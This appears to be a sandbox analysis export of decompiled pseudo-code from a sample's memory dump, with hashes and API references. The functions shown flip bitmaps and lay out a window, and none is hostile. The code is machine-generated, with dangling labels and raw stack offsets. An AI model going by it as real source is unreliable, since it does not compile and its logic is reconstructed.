Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$CopyParentWindow
String ID:
API String ID: 642869531-0
Opcode ID: 2fcb247964b189e670a5498a0ae350a90498a6052b4cd0d86004db6b94c6a51e
Instruction ID: 7a19d621138a8f06397edca365325a3e43010dda3c519bd4e2789b37859e5b50
Opcode Fuzzy Hash: 2fcb247964b189e670a5498a0ae350a90498a6052b4cd0d86004db6b94c6a51e
Instruction Fuzzy Hash: 18B1C672E002199FDF11CFA9D948AEEBBF5AF08751F14416AE805E7250EB74DA48CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CDE412 Relevance: 15.2, APIs: 10, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CDE412(void* __ebx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t86;
				signed int _t90;
				signed int _t100;
				int _t102;
				signed int _t103;
				long _t104;
				signed int _t109;
				signed short _t110;
				int _t113;
				signed int _t119;
				signed int _t124;
				int _t125;
				void* _t131;
				int _t132;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				int _t140;
				signed int _t141;
				signed int _t143;
				signed int _t145;
				int _t147;
				signed int _t148;
				signed int _t150;
				signed int _t152;
				void* _t153;
				void* _t154;

				_t149 = __esi;
				_push(0xa4);
				E00DDD55F(0xe0a99b, __ebx, __edi, __esi);
				_t124 =  *(_t153 + 8);
				_t145 =  *(_t153 + 0xc);
				 *(_t153 - 0x7c) = _t145;
				if( *_t124 != 0) {
					_t86 = GetObjectA( *_t124, 0x18, _t153 - 0xb0);
					__eflags = _t86;
					if(_t86 == 0) {
						L34:
						__eflags = 0;
					} else {
						 *(_t153 - 0x70) =  *(_t153 - 0xac);
						_t90 =  *(_t153 - 0xa8);
						asm("cdq");
						_t138 = _t90 % _t145;
						__eflags =  *((short*)(_t153 - 0x9e)) - 0x10;
						_t149 = _t90 / _t145;
						 *(_t153 - 0x6c) = _t149;
						if( *((short*)(_t153 - 0x9e)) < 0x10) {
							E00CB9032(_t153 - 0x98);
							_t145 = 0;
							 *((intOrPtr*)(_t153 - 4)) = 0;
							E00CB9B84(_t124, _t153 - 0x98, CreateCompatibleDC(0));
							__eflags =  *_t124;
							if( *_t124 != 0) {
								_t131 = SelectObject( *(_t153 - 0x94),  *_t124);
								__eflags = _t131;
								if(_t131 != 0) {
									__eflags = _t149;
									if(_t149 > 0) {
										_t124 =  *(_t153 - 0x7c);
										asm("cdq");
										_t100 = _t124 - _t138;
										__eflags = _t100;
										 *(_t153 - 0x88) = _t131;
										 *(_t153 - 0x78) = _t100 >> 1;
										_t102 = 0;
										 *(_t153 - 0x84) = 0;
										do {
											_t132 = _t102;
											_t140 = _t124 - 1 + _t102;
											 *(_t153 - 0x74) = _t132;
											__eflags =  *(_t153 - 0x78);
											 *(_t153 - 0x68) = _t140;
											if( *(_t153 - 0x78) > 0) {
												_t103 =  *(_t153 - 0x78);
												_t150 =  *(_t153 - 0x70);
												 *(_t153 - 0x80) = _t103;
												do {
													_t125 = _t145;
													__eflags = _t150;
													if(_t150 > 0) {
														_t147 =  *(_t153 - 0x74);
														do {
															_t104 = GetPixel( *(_t153 - 0x94), _t125, _t147);
															SetPixel( *(_t153 - 0x94), _t125, _t147, GetPixel( *(_t153 - 0x94), _t125,  *(_t153 - 0x68)));
															SetPixel( *(_t153 - 0x94), _t125,  *(_t153 - 0x68), _t104);
															_t125 = _t125 + 1;
															__eflags = _t125 -  *(_t153 - 0x70);
														} while (_t125 <  *(_t153 - 0x70));
														_t132 =  *(_t153 - 0x74);
														_t145 = 0;
														__eflags = 0;
														_t140 =  *(_t153 - 0x68);
														_t103 =  *(_t153 - 0x80);
														_t150 =  *(_t153 - 0x70);
													}
													_t132 = _t132 + 1;
													_t140 = _t140 - 1;
													_t103 = _t103 - 1;
													__eflags = _t103;
													 *(_t153 - 0x74) = _t132;
													 *(_t153 - 0x68) = _t140;
													 *(_t153 - 0x80) = _t103;
												} while (_t103 != 0);
												_t124 =  *(_t153 - 0x7c);
												_t149 =  *(_t153 - 0x6c);
												_t102 =  *(_t153 - 0x84);
											}
											_t102 = _t102 + _t124;
											_t149 = _t149 - 1;
											__eflags = _t149;
											 *(_t153 - 0x84) = _t102;
											 *(_t153 - 0x6c) = _t149;
										} while (_t149 != 0);
										_t131 =  *(_t153 - 0x88);
									}
									SelectObject( *(_t153 - 0x94), _t131);
									_t145 = 1;
									__eflags = 1;
								}
							}
							E00CB91A4(_t153 - 0x98);
						} else {
							_t109 = GetObjectA( *_t124, 0x54, _t153 - 0x64);
							__eflags = _t109;
							if(_t109 == 0) {
								goto L34;
							} else {
								_t110 =  *((intOrPtr*)(_t153 - 0x52));
								__eflags = _t110 -  *((intOrPtr*)(_t153 - 0x9e));
								if(_t110 !=  *((intOrPtr*)(_t153 - 0x9e))) {
									goto L34;
								} else {
									_t149 =  *(_t153 - 0x50);
									 *(_t153 - 0x78) = _t149;
									__eflags = _t149;
									if(_t149 == 0) {
										goto L34;
									} else {
										asm("cdq");
										_t141 = _t138 & 0x00000007;
										_t124 = _t141 + (_t110 & 0x0000ffff) *  *(_t153 - 0x70) >> 3;
										__eflags = _t124 & 0x00000003;
										if(__eflags != 0) {
											_t124 = (_t124 & 0xfffffffc) + 4;
											__eflags = _t124;
										}
										_push(_t124);
										_t113 = E00CA95C0(__eflags);
										__eflags =  *(_t153 - 0x6c);
										 *(_t153 - 0x68) = _t113;
										if( *(_t153 - 0x6c) > 0) {
											asm("cdq");
											_t136 = (_t145 - 1) * _t124;
											_t119 =  *(_t153 - 0x6c);
											_t143 = _t145 - _t141 >> 1;
											_t145 = _t145 * _t124;
											__eflags = _t145;
											 *(_t153 - 0x70) = _t143;
											 *(_t153 - 0x88) = _t136;
											 *(_t153 - 0x7c) = _t145;
											do {
												_t137 = _t136 + _t149;
												 *(_t153 - 0x84) = _t149;
												 *(_t153 - 0x80) = _t137;
												__eflags = _t143;
												if(_t143 > 0) {
													_t148 = _t149;
													 *(_t153 - 0x74) = _t143;
													_t152 = _t137;
													do {
														E00DDF660( *(_t153 - 0x68), _t148, _t124);
														E00DDF660(_t148, _t152, _t124);
														E00DDF660(_t152,  *(_t153 - 0x68), _t124);
														_t154 = _t154 + 0x24;
														_t148 = _t148 + _t124;
														_t152 = _t152 - _t124;
														_t35 = _t153 - 0x74;
														 *_t35 =  *(_t153 - 0x74) - 1;
														__eflags =  *_t35;
													} while ( *_t35 != 0);
													_t149 =  *(_t153 - 0x78);
													_t145 =  *(_t153 - 0x7c);
													_t119 =  *(_t153 - 0x6c);
													_t143 =  *(_t153 - 0x70);
												}
												_t136 =  *(_t153 - 0x88);
												_t149 = _t149 + _t145;
												_t119 = _t119 - 1;
												__eflags = _t119;
												 *(_t153 - 0x78) = _t149;
												 *(_t153 - 0x6c) = _t119;
											} while (_t119 != 0);
											_t113 =  *(_t153 - 0x68);
										}
										L00CA95BB(_t113);
										goto L1;
									}
								}
							}
						}
					}
				} else {
					L1:
				}
				return E00DDD50E(_t124, _t145, _t149);
			}

0x00cde412
0x00cde412
0x00cde41c
0x00cde421
0x00cde424
0x00cde427
0x00cde42d
0x00cde442
0x00cde448
0x00cde44a
0x00cde6a0
0x00cde6a0
0x00cde450
0x00cde456
0x00cde459
0x00cde45f
0x00cde460
0x00cde462
0x00cde46a
0x00cde46c
0x00cde46f
0x00cde56e
0x00cde573
0x00cde576
0x00cde586
0x00cde58b
0x00cde58d
0x00cde5a1
0x00cde5a3
0x00cde5a5
0x00cde5ab
0x00cde5ad
0x00cde5b3
0x00cde5b8
0x00cde5b9
0x00cde5b9
0x00cde5bb
0x00cde5c3
0x00cde5c6
0x00cde5c8
0x00cde5ce
0x00cde5d1
0x00cde5d3
0x00cde5d5
0x00cde5d8
0x00cde5dc
0x00cde5df
0x00cde5e5
0x00cde5e8
0x00cde5eb
0x00cde5ee
0x00cde5ee
0x00cde5f0
0x00cde5f2
0x00cde5f4
0x00cde5f7
0x00cde5ff
0x00cde620
0x00cde631
0x00cde637
0x00cde638
0x00cde638
0x00cde63d
0x00cde640
0x00cde640
0x00cde642
0x00cde645
0x00cde648
0x00cde648
0x00cde64b
0x00cde64c
0x00cde64d
0x00cde64d
0x00cde650
0x00cde653
0x00cde656
0x00cde656
0x00cde65b
0x00cde65e
0x00cde661
0x00cde661
0x00cde667
0x00cde669
0x00cde669
0x00cde66c
0x00cde672
0x00cde672
0x00cde67b
0x00cde67b
0x00cde688
0x00cde690
0x00cde690
0x00cde690
0x00cde5a5
0x00cde697
0x00cde475
0x00cde47d
0x00cde483
0x00cde485
0x00000000
0x00cde48b
0x00cde48b
0x00cde48f
0x00cde496
0x00000000
0x00cde49c
0x00cde49c
0x00cde49f
0x00cde4a2
0x00cde4a4
0x00000000
0x00cde4aa
0x00cde4b1
0x00cde4b2
0x00cde4b8
0x00cde4bb
0x00cde4be
0x00cde4c3
0x00cde4c3
0x00cde4c3
0x00cde4c6
0x00cde4c7
0x00cde4cc
0x00cde4d1
0x00cde4d4
0x00cde4df
0x00cde4e2
0x00cde4e7
0x00cde4ea
0x00cde4ec
0x00cde4ec
0x00cde4ef
0x00cde4f2
0x00cde4f8
0x00cde4fb
0x00cde4fb
0x00cde4fd
0x00cde503
0x00cde506
0x00cde508
0x00cde50a
0x00cde50c
0x00cde50f
0x00cde511
0x00cde516
0x00cde51e
0x00cde528
0x00cde52d
0x00cde530
0x00cde532
0x00cde534
0x00cde534
0x00cde534
0x00cde534
0x00cde53a
0x00cde53d
0x00cde540
0x00cde543
0x00cde543
0x00cde546
0x00cde54c
0x00cde54e
0x00cde54e
0x00cde551
0x00cde554
0x00cde554
0x00cde559
0x00cde559
0x00cde55d
0x00000000
0x00cde562
0x00cde4a4
0x00cde496
0x00cde485
0x00cde46f
0x00cde42f
0x00cde42f
0x00cde431
0x00cde6a7

APIs

__EH_prolog3_GS.LIBCMT ref: 00CDE41C
GetObjectA.GDI32(?,00000018,?), ref: 00CDE442
GetObjectA.GDI32(?,00000054,?), ref: 00CDE47D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Object$H_prolog3_
String ID:
API String ID: 278301568-0
Opcode ID: 1d19d841891c20444e291725bf57a8f16f0a78dbcff27a76a412b6921d0e726b
Instruction ID: 7f34de855a64be1c3b8a605d1a322c3e703987afe90b2fb8d6bc4f68841dc613
Opcode Fuzzy Hash: 1d19d841891c20444e291725bf57a8f16f0a78dbcff27a76a412b6921d0e726b
Instruction Fuzzy Hash: AD814671D002289FDF209FA9CC84AADBBB5FF49704F1481AAE959AB351DB309D85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD4F9 Relevance: 15.2, APIs: 10, Instructions: 204
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00CCD4F9(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, intOrPtr* __edi, intOrPtr __esi, void* __eflags, void* __fp0) {
				void* _t82;
				intOrPtr _t88;
				intOrPtr _t102;
				int _t107;
				intOrPtr* _t129;
				intOrPtr _t147;
				intOrPtr _t163;
				void* _t166;
				intOrPtr _t171;
				int _t173;
				void* _t174;
				void* _t179;
				void* _t194;

				_t194 = __fp0;
				_t169 = __esi;
				_t165 = __edi;
				_t162 = __edx;
				_push(0x90);
				E00DDD55F(0xe09b64, __ebx, __edi, __esi);
				_t129 = __ecx;
				if(__ecx != 0) {
					_t182 =  *(__ecx + 0x20);
					if( *(__ecx + 0x20) != 0) {
						_push(__ecx);
						E00CB8FDD(__ecx, _t179 - 0x6c, __edx, __edi, __esi, _t182);
						 *((intOrPtr*)(_t179 - 4)) = 0;
						_t166 = E00CD1875(__ecx, _t179 - 0x6c);
						GetTextMetricsA( *(_t179 - 0x64), _t179 - 0x58);
						 *((intOrPtr*)(__ecx + 0x350)) = 0;
						 *((intOrPtr*)(__ecx + 0x354)) =  *(_t179 - 0x58) + 4;
						 *(_t179 - 0x20) = 0;
						 *((intOrPtr*)(_t179 - 0x1c)) = 0;
						 *((intOrPtr*)(_t179 - 0x18)) = 0;
						 *((intOrPtr*)(_t179 - 0x14)) = 0;
						GetClientRect( *(__ecx + 0x20), _t179 - 0x20);
						_t171 =  *_t129;
						if( *((intOrPtr*)(_t129 + 0x2f8)) == 0) {
							 *0xe17a64();
							_t82 =  *((intOrPtr*)(_t171 + 0x164))();
							_push(0);
						} else {
							 *((intOrPtr*)(_t129 + 0x350)) =  *((intOrPtr*)(_t129 + 0x354)) + 4;
							 *0xe17a64();
							_t174 =  *((intOrPtr*)(_t171 + 0x164))();
							_t107 =  *(_t129 + 0x31c);
							if(_t107 == 0) {
								_t107 = GetStockObject(0x11);
							}
							SendMessageA( *(_t174 + 0x20), 0x30, _t107, 0);
							 *0xe17a64();
							E00CB7A83( *((intOrPtr*)( *((intOrPtr*)( *_t129 + 0x164))))(), 0,  *(_t179 - 0x20),  *((intOrPtr*)(_t179 - 0x1c)),  *((intOrPtr*)(_t179 - 0x18)) -  *(_t179 - 0x20),  *((intOrPtr*)(_t129 + 0x350)), 0x14);
							 *(_t179 - 0x9c) = 1;
							 *((intOrPtr*)(_t179 - 0x98)) =  *((intOrPtr*)(_t129 + 0x358)) + 2;
							 *0xe17a64();
							SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)( *_t129 + 0x164))))() + 0x20), 0x1204, 0, _t179 - 0x9c);
							 *((intOrPtr*)(_t179 - 0x98)) =  *((intOrPtr*)(_t179 - 0x18)) -  *(_t179 - 0x20) + 0xa;
							 *0xe17a64();
							SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)( *_t129 + 0x164))))() + 0x20), 0x1204, 1, _t179 - 0x9c);
							 *0xe17a64();
							_t82 =  *((intOrPtr*)( *((intOrPtr*)( *_t129 + 0x164))))();
							_push(4);
						}
						E00CB7B32(_t82);
						SelectObject( *(_t179 - 0x68), _t166);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *((intOrPtr*)(_t129 + 0x32c)) =  *((intOrPtr*)(_t129 + 0x32c)) +  *((intOrPtr*)(_t129 + 0x350));
						if( *((intOrPtr*)(_t129 + 0x2fc)) != 0) {
							_t147 =  *((intOrPtr*)(_t129 + 0x338));
							if(_t147 != 0xffffffff) {
								_t162 =  *((intOrPtr*)(_t179 - 0x14));
								if(_t162 -  *((intOrPtr*)(_t179 - 0x1c)) > 0) {
									_t102 =  *((intOrPtr*)(_t129 + 0x354));
									if(_t147 <= _t102) {
										_t147 = _t102;
									}
									_t162 = _t162 - _t102 -  *((intOrPtr*)(_t179 - 0x1c));
									if(_t147 >= _t162) {
										_t147 = _t162;
									}
									 *((intOrPtr*)(_t129 + 0x334)) =  *((intOrPtr*)(_t129 + 0x334)) - _t147;
									 *((intOrPtr*)(_t129 + 0x338)) = _t147;
								}
							}
						}
						_t173 = GetSystemMetrics(0x15);
						E00CD1AD0(_t129, _t162);
						_t191 =  *((intOrPtr*)(_t129 + 0x360));
						if( *((intOrPtr*)(_t129 + 0x360)) <= 0) {
							_t163 = 0;
							_t139 = 0;
							_t169 = 0;
							_t88 = 0;
						} else {
							 *((intOrPtr*)(_t129 + 0x330)) =  *((intOrPtr*)(_t129 + 0x330)) - _t173;
							_t139 =  *((intOrPtr*)(_t129 + 0x32c));
							_t88 =  *((intOrPtr*)(_t129 + 0x334)) -  *((intOrPtr*)(_t129 + 0x32c));
							_t163 =  *((intOrPtr*)(_t129 + 0x330));
						}
						E00CB7A83(_t129 + 0x278, 0, _t163, _t139, _t169, _t88, 0x14);
						E00CD122D(_t129, _t163, _t191, _t194);
						_t165 =  *((intOrPtr*)(_t129 + 0x3d8));
						if(_t165 != 0) {
							_t169 =  *((intOrPtr*)( *_t165 + 0x94));
							 *0xe17a64();
							if( *((intOrPtr*)( *((intOrPtr*)( *_t165 + 0x94))))() != 0) {
								_t165 =  *((intOrPtr*)(_t129 + 0x3d8));
								_t169 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x3d8)))) + 0x78));
								 *0xe17a64();
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x3d8)))) + 0x78))))();
							}
						}
						RedrawWindow( *(_t129 + 0x20), 0, 0, 0x105);
						E00CB9150(_t179 - 0x6c);
					}
				}
				return E00DDD50E(_t129, _t165, _t169);
			}

0x00ccd4f9
0x00ccd4f9
0x00ccd4f9
0x00ccd4f9
0x00ccd4f9
0x00ccd503
0x00ccd508
0x00ccd50c
0x00ccd512
0x00ccd516
0x00ccd51c
0x00ccd520
0x00ccd52d
0x00ccd535
0x00ccd53e
0x00ccd551
0x00ccd557
0x00ccd55d
0x00ccd560
0x00ccd563
0x00ccd566
0x00ccd569
0x00ccd576
0x00ccd57e
0x00ccd68b
0x00ccd693
0x00ccd699
0x00ccd584
0x00ccd58d
0x00ccd593
0x00ccd5a1
0x00ccd5a3
0x00ccd5ab
0x00ccd5af
0x00ccd5af
0x00ccd5bd
0x00ccd5cd
0x00ccd5f0
0x00ccd5fe
0x00ccd608
0x00ccd618
0x00ccd633
0x00ccd642
0x00ccd652
0x00ccd66d
0x00ccd67d
0x00ccd685
0x00ccd687
0x00ccd687
0x00ccd69d
0x00ccd6a6
0x00ccd6bb
0x00ccd6bc
0x00ccd6bd
0x00ccd6be
0x00ccd6bf
0x00ccd6cd
0x00ccd6cf
0x00ccd6d8
0x00ccd6da
0x00ccd6e4
0x00ccd6e6
0x00ccd6ee
0x00ccd6f0
0x00ccd6f0
0x00ccd6f4
0x00ccd6f9
0x00ccd6fb
0x00ccd6fb
0x00ccd6fd
0x00ccd703
0x00ccd703
0x00ccd6e4
0x00ccd6d8
0x00ccd713
0x00ccd715
0x00ccd71a
0x00ccd720
0x00ccd73e
0x00ccd740
0x00ccd742
0x00ccd744
0x00ccd722
0x00ccd722
0x00ccd72e
0x00ccd734
0x00ccd736
0x00ccd736
0x00ccd753
0x00ccd75a
0x00ccd75f
0x00ccd767
0x00ccd76b
0x00ccd773
0x00ccd77f
0x00ccd781
0x00ccd789
0x00ccd78e
0x00ccd796
0x00ccd796
0x00ccd77f
0x00ccd7a4
0x00ccd7ad
0x00ccd7ad
0x00ccd516
0x00ccd7b7

APIs

__EH_prolog3_GS.LIBCMT ref: 00CCD503

Part of subcall function 00CB8FDD: __EH_prolog3.LIBCMT ref: 00CB8FE4
Part of subcall function 00CB8FDD: GetDC.USER32(00000000), ref: 00CB9010

Part of subcall function 00CD1875: GetStockObject.GDI32(00000011), ref: 00CD1884
Part of subcall function 00CD1875: SelectObject.GDI32(?,?), ref: 00CD1896

GetTextMetricsA.GDI32(?,?), ref: 00CCD53E
GetClientRect.USER32(00000000,00000000), ref: 00CCD569
GetStockObject.GDI32(00000011), ref: 00CCD5AF
SendMessageA.USER32(?,00000030,?,00000000), ref: 00CCD5BD
SendMessageA.USER32(?,00001204,00000000,00000001), ref: 00CCD633
SendMessageA.USER32(?,00001204,00000001,00000001), ref: 00CCD66D
SelectObject.GDI32(?,00000000), ref: 00CCD6A6
GetSystemMetrics.USER32 ref: 00CCD70B
RedrawWindow.USER32(00000000,00000000,00000000,00000105,00000000,00000000,00000000,00000000,00000000,00000014), ref: 00CCD7A4

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Object$MessageSend$MetricsSelectStock$ClientH_prolog3H_prolog3_RectRedrawSystemTextWindow
String ID:
API String ID: 591413167-0
Opcode ID: 5bd7c6772e534e81348e1fb7624684ba0f960eca495df9300b78a49342651123
Instruction ID: 0ed6b325328f76b0a29809ea54c3652a63305d9405e3a5d7634e05fcabbc02bd
Opcode Fuzzy Hash: 5bd7c6772e534e81348e1fb7624684ba0f960eca495df9300b78a49342651123
Instruction Fuzzy Hash: 27816831A006149FDF059F64CC99BED7BB6EF48700F0841B9F91AAB3A6DB706A45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CDE16A Relevance: 15.2, APIs: 10, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00CDE16A(int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t99;
				void** _t103;
				void* _t106;
				int _t108;
				signed int _t111;
				long _t112;
				void* _t118;
				int _t121;
				signed int _t130;
				int _t133;
				signed int _t134;
				int _t138;
				signed int _t139;
				int _t140;
				intOrPtr _t141;
				int _t143;
				int _t146;
				signed int _t147;
				signed int _t148;
				int _t150;
				int _t152;
				intOrPtr* _t153;
				signed int _t155;
				int _t157;
				int _t159;
				void* _t160;

				_t132 = __ebx;
				_push(0xb8);
				E00DDD55F(0xe0a961, __ebx, __edi, __esi);
				_t150 =  *(_t160 + 8);
				_t155 =  *(_t160 + 0xc);
				 *(_t160 - 0x7c) = _t150;
				 *(_t160 - 0x8c) = _t155;
				if( *_t150 != 0) {
					if(GetObjectA( *_t150, 0x18, _t160 - 0xc4) == 0) {
						L35:
					} else {
						_t134 =  *(_t160 - 0xc0);
						 *(_t160 - 0x6c) =  *(_t160 - 0xbc);
						asm("cdq");
						_t132 = _t134 / _t155;
						 *(_t160 - 0x84) = _t134;
						_t99 = 0x20;
						 *(_t160 - 0x70) = _t132;
						if( *((intOrPtr*)(_t160 - 0xb2)) != _t99) {
							E00CB9032(_t160 - 0x9c);
							_t150 = 0;
							 *((intOrPtr*)(_t160 - 4)) = 0;
							E00CB9B84(_t132, _t160 - 0x9c, CreateCompatibleDC(0));
							_t103 =  *(_t160 - 0x7c);
							if( *_t103 != 0) {
								_t106 = SelectObject( *(_t160 - 0x98),  *_t103);
								if(_t106 != 0) {
									if(_t132 > 0) {
										_t143 =  *(_t160 - 0x6c);
										_t138 = 0;
										 *(_t160 - 0x80) = _t106;
										_t108 =  *(_t160 - 0x70);
										 *(_t160 - 0x74) = 0;
										do {
											_t132 = _t150;
											if(_t143 > 0) {
												asm("cdq");
												_t111 = _t155 - _t143 >> 1;
												 *(_t160 - 0x7c) = _t111;
												do {
													_t152 = _t138;
													 *(_t160 - 0x68) = _t155 - 1 + _t138;
													if(_t111 > 0) {
														 *(_t160 - 0x78) = _t111;
														do {
															_t112 = GetPixel( *(_t160 - 0x98), _t152, _t132);
															SetPixel( *(_t160 - 0x98), _t152, _t132, GetPixel( *(_t160 - 0x98),  *(_t160 - 0x68), _t132));
															_t157 =  *(_t160 - 0x68);
															SetPixel( *(_t160 - 0x98), _t157, _t132, _t112);
															_t152 = _t152 + 1;
															_t75 = _t160 - 0x78;
															 *_t75 =  *(_t160 - 0x78) - 1;
															 *(_t160 - 0x68) = _t157 - 1;
														} while ( *_t75 != 0);
														_t155 =  *(_t160 - 0x8c);
														_t138 =  *(_t160 - 0x74);
														_t111 =  *(_t160 - 0x7c);
													}
													_t143 =  *(_t160 - 0x6c);
													_t132 = _t132 + 1;
												} while (_t132 < _t143);
												_t108 =  *(_t160 - 0x70);
												_t150 = 0;
											}
											_t138 = _t138 + _t155;
											_t108 = _t108 - 1;
											 *(_t160 - 0x74) = _t138;
											 *(_t160 - 0x70) = _t108;
										} while (_t108 != 0);
										_t106 =  *(_t160 - 0x80);
									}
									SelectObject( *(_t160 - 0x98), _t106);
									_t150 = 1;
								}
							}
							E00CB91A4(_t160 - 0x9c);
						} else {
							if(GetObjectA( *_t150, 0x54, _t160 - 0x64) == 0) {
								goto L35;
							} else {
								_t118 = 0x20;
								if( *((intOrPtr*)(_t160 - 0x52)) != _t118) {
									goto L35;
								} else {
									_t150 =  *(_t160 - 0x50);
									 *(_t160 - 0xac) = _t150;
									if(_t150 == 0) {
										goto L35;
									} else {
										if(_t132 > 0) {
											_t146 =  *(_t160 - 0x6c);
											_t139 = 0;
											 *(_t160 - 0x78) = 0;
											 *(_t160 - 0x7c) = _t155 << 2;
											_t121 = _t150;
											 *(_t160 - 0x68) = _t121;
											do {
												if(_t146 > 0) {
													_t133 =  *(_t160 - 0x68);
													asm("cdq");
													_t147 = _t139;
													_t140 =  *(_t160 - 0x6c);
													 *(_t160 - 0xa0) = _t155 - _t146 >> 1;
													 *(_t160 - 0x88) = _t147;
													 *(_t160 - 0x80) =  *(_t160 - 0x84) << 2;
													 *(_t160 - 0x74) = _t140;
													do {
														 *(_t160 - 0xa4) = _t133;
														 *((intOrPtr*)(_t160 - 0xa8)) = _t150 + (_t155 - 1 + _t147) * 4;
														_t130 =  *(_t160 - 0xa0);
														if(_t130 > 0) {
															_t153 =  *((intOrPtr*)(_t160 - 0xa8));
															_t148 = _t130;
															_t159 = _t133;
															do {
																_t141 =  *_t159;
																 *_t159 =  *_t153;
																_t159 = _t159 + 4;
																 *_t153 = _t141;
																_t153 = _t153 - 4;
																_t148 = _t148 - 1;
															} while (_t148 != 0);
															_t155 =  *(_t160 - 0x8c);
															_t150 =  *(_t160 - 0xac);
															_t147 =  *(_t160 - 0x88);
															_t140 =  *(_t160 - 0x74);
														}
														_t147 = _t147 +  *(_t160 - 0x84);
														_t133 = _t133 +  *(_t160 - 0x80);
														_t140 = _t140 - 1;
														 *(_t160 - 0x88) = _t147;
														 *(_t160 - 0x74) = _t140;
													} while (_t140 != 0);
													_t132 =  *(_t160 - 0x70);
													_t139 =  *(_t160 - 0x78);
													_t121 =  *(_t160 - 0x68);
													_t146 =  *(_t160 - 0x6c);
												}
												_t121 = _t121 +  *(_t160 - 0x7c);
												_t139 = _t139 + _t155;
												_t132 = _t132 - 1;
												 *(_t160 - 0x78) = _t139;
												 *(_t160 - 0x68) = _t121;
												 *(_t160 - 0x70) = _t132;
											} while (_t132 != 0);
										}
										goto L17;
									}
								}
							}
						}
					}
				}
				return E00DDD50E(_t132, _t150, _t155);
			}

0x00cde16a
0x00cde16a
0x00cde174
0x00cde179
0x00cde17c
0x00cde17f
0x00cde182
0x00cde18b
0x00cde1a4
0x00cde40b
0x00cde1aa
0x00cde1b0
0x00cde1b6
0x00cde1bb
0x00cde1c0
0x00cde1c2
0x00cde1c8
0x00cde1c9
0x00cde1d3
0x00cde2f7
0x00cde2fc
0x00cde2ff
0x00cde30f
0x00cde314
0x00cde319
0x00cde327
0x00cde32f
0x00cde337
0x00cde33d
0x00cde340
0x00cde342
0x00cde345
0x00cde348
0x00cde34b
0x00cde34b
0x00cde34f
0x00cde357
0x00cde35a
0x00cde35c
0x00cde35f
0x00cde362
0x00cde366
0x00cde36b
0x00cde36d
0x00cde370
0x00cde378
0x00cde399
0x00cde3a0
0x00cde3ab
0x00cde3b1
0x00cde3b3
0x00cde3b3
0x00cde3b7
0x00cde3b7
0x00cde3bc
0x00cde3c2
0x00cde3c5
0x00cde3c5
0x00cde3c8
0x00cde3cb
0x00cde3cc
0x00cde3d0
0x00cde3d3
0x00cde3d3
0x00cde3d5
0x00cde3d7
0x00cde3da
0x00cde3dd
0x00cde3dd
0x00cde3e6
0x00cde3e6
0x00cde3f0
0x00cde3f8
0x00cde3f8
0x00cde32f
0x00cde3ff
0x00cde1d9
0x00cde1e9
0x00000000
0x00cde1ef
0x00cde1f1
0x00cde1f6
0x00000000
0x00cde1fc
0x00cde1fc
0x00cde1ff
0x00cde207
0x00000000
0x00cde20d
0x00cde20f
0x00cde215
0x00cde218
0x00cde21c
0x00cde222
0x00cde225
0x00cde227
0x00cde22a
0x00cde22c
0x00cde232
0x00cde237
0x00cde23a
0x00cde23c
0x00cde241
0x00cde250
0x00cde256
0x00cde259
0x00cde25c
0x00cde25f
0x00cde26a
0x00cde270
0x00cde278
